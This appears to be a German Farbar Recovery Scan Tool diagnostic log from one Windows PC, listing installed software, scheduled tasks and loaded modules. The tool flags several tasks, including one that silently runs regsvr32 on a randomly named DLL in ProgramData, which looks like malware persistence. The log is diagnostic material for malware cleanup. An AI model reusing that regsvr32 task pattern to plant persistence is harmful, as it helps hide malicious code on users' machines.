Catalyst Control Center Next Localization FI (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization FR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization HU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization IT (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization JA (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization KO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization NO (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization PL (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization RU (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2016.1121.1657.30480 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden
Cities Skyline (HKLM-x32\...\Cities Skyline_is1) (Version: 1.0.5.0 - Paradox Interactive)
CrystalDiskInfo 6.3.2 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 6.3.2 - Crystal Dew World)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Discord (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Drakonia Configurator (HKLM-x32\...\{2EAD3327-2F92-455F-A675-E5CC4980B67A}}_is1) (Version: - )
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 18.2.22525 - Landesfinanzdirektion Thüringen)
EVEREST Home Edition v2.20 (HKLM-x32\...\EVEREST Home Edition_is1) (Version: 2.20 - Lavalys Inc)
Ghost Recon Wildlands Beta (HKLM-x32\...\Uplay Install 2970) (Version: - Ubisoft)
Ghostery (HKLM-x32\...\Ghostery) (Version: - Ghostery Inc)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Malwarebytes Version 3.1.2.1733 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.1.2.1733 - Malwarebytes)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2010-Tools für Office-Laufzeit (x64) Language Pack - DEU (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - DEU) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{B3B750C0-8C22-439D-B7CE-67F3ED99CC2B}) (Version: 1.20.146.0 - Microsoft)
Mozilla Firefox 53.0.3 (x86 de) (HKLM-x32\...\Mozilla Firefox 53.0.3 (x86 de)) (Version: 53.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 53.0.3.6347 - Mozilla)
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
Panda Devices Agent (x32 Version: 1.03.07 - Panda Security) Hidden
Panda Devices Agent (x32 Version: 1.06.00 - Panda Security) Hidden
Panda Free Antivirus (Version: 8.04.00.0000 - Panda Security) Hidden
PDF24 Creator 7.9.0 (HKLM-x32\...\{81A6F461-0DBA-4F12-B56F-0E977EC10576}_is1) (Version: - PDF24.org)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.31.423.2014 - Realtek)
Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7503 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Sacred 3 (HKLM-x32\...\Steam App 247950) (Version: - Keen Games)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.16084.2 - Samsung Electronics Co., Ltd.) Hidden
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 4.5.1 - Samsung Electronics)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
Samsung_MonSetup (HKLM-x32\...\{8EA79DBF-D637-448A-89D6-410A087A4493}) (Version: 1.00.0000 - Samsung)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.86.0859 - Electronic Arts)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.)
Smart Switch (x32 Version: 4.1.17022.20 - Samsung Electronics Co., Ltd.) Hidden
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
Spotify (HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\...\Spotify) (Version: 1.0.48.103.g15edf1ec - Spotify AB)
StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Tom Clancy's The Division (HKLM-x32\...\Uplay Install 568) (Version: - Ubisoft)
Unlocker 1.9.2 (HKLM\...\Unlocker) (Version: 1.9.2 - Cedrick Collomb)
Uplay (HKLM-x32\...\Uplay) (Version: 6.0 - Ubisoft)
Vulkan Run Time Libraries 1.0.3.1 (HKLM\...\VulkanRT1.0.3.1) (Version: 1.0.3.1 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.39.1 (HKLM\...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version: - Relic Entertainment)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.21 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WISO steuer:Start 2016 (HKLM-x32\...\{B9654E81-E678-4A75-B477-1F83298CF149}) (Version: 23.00.1146 - Buhl Data Service GmbH)
WISO steuer:Start 2017 (HKLM-x32\...\{E3EAD09D-5F46-48BA-A3D3-7CC9822F5300}) (Version: 24.00.1375 - Buhl Data Service GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
Task: {0E3459D3-17FE-4CF3-9730-4DC3A34F39EC} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2017-02-02] (Bitdefender)
Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => %SystemRoot%\System32\AutoWorkplace.exe
Task: {362E13C9-3468-4E32-A32C-E7B73761F42A} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe [2014-09-28] (Samsung Electronics.)
Task: {4B617730-7F30-425D-896B-9D6B7E92F1EF} - System32\Tasks\ASUS\ASUS DIPAwayMode => C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe [2014-10-11] ()
Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
Task: {8FA48323-C067-45BF-82AC-B16DB622D2CD} - System32\Tasks\ASUS\ASUS AISuiteIII => C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe [2014-09-11] (ASUSTeK Computer Inc.)
Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
Task: {996A2D51-2381-4CF1-B5CC-88C9013C7FF4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-12] (Adobe Systems Incorporated)
Task: {99C86340-AB3F-46C9-9F72-4DE95AD5BB9B} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-05-09] (Microsoft Corporation)
Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
Task: {A8EBBD79-429F-465A-9D7C-9D64A3AF7F70} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-04-24] (Bitdefender)
Task: {AF01F576-2A60-442D-A455-18C1D644581F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {C2B4A663-9C22-4E38-8EB4-5FD10B7D021F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-22] (Google Inc.)
Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
Task: {CAD24F5C-D14E-4397-9E26-049636A6E220} - System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9} => C:\ProgramData\{CA67D69C-7DCC-6137-7CD8-F928B38095A6}\8979DA1C-3ED2-6DB7-EB4A-721A167AE95D.exe <==== ACHTUNG
Task: {CB7B2173-4772-4267-9E22-FAED240AC907} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.)
Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2017-04-24 17:59 - 2017-04-24 17:59 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
2017-02-07 18:52 - 2017-02-07 18:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpbr.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2017-05-22 18:25 - 2017-05-09 16:38 - 02270672 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2010-07-15 06:44 - 2010-07-15 06:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-07 17:13 - 2017-05-22 18:29 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
AlternateDataStreams: C:\Users\Dino\Desktop\AdwCleaner_6.046.exe:BDU [0]
AlternateDataStreams: C:\Users\Dino\Desktop\tdsskiller.exe:BDU [0]
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
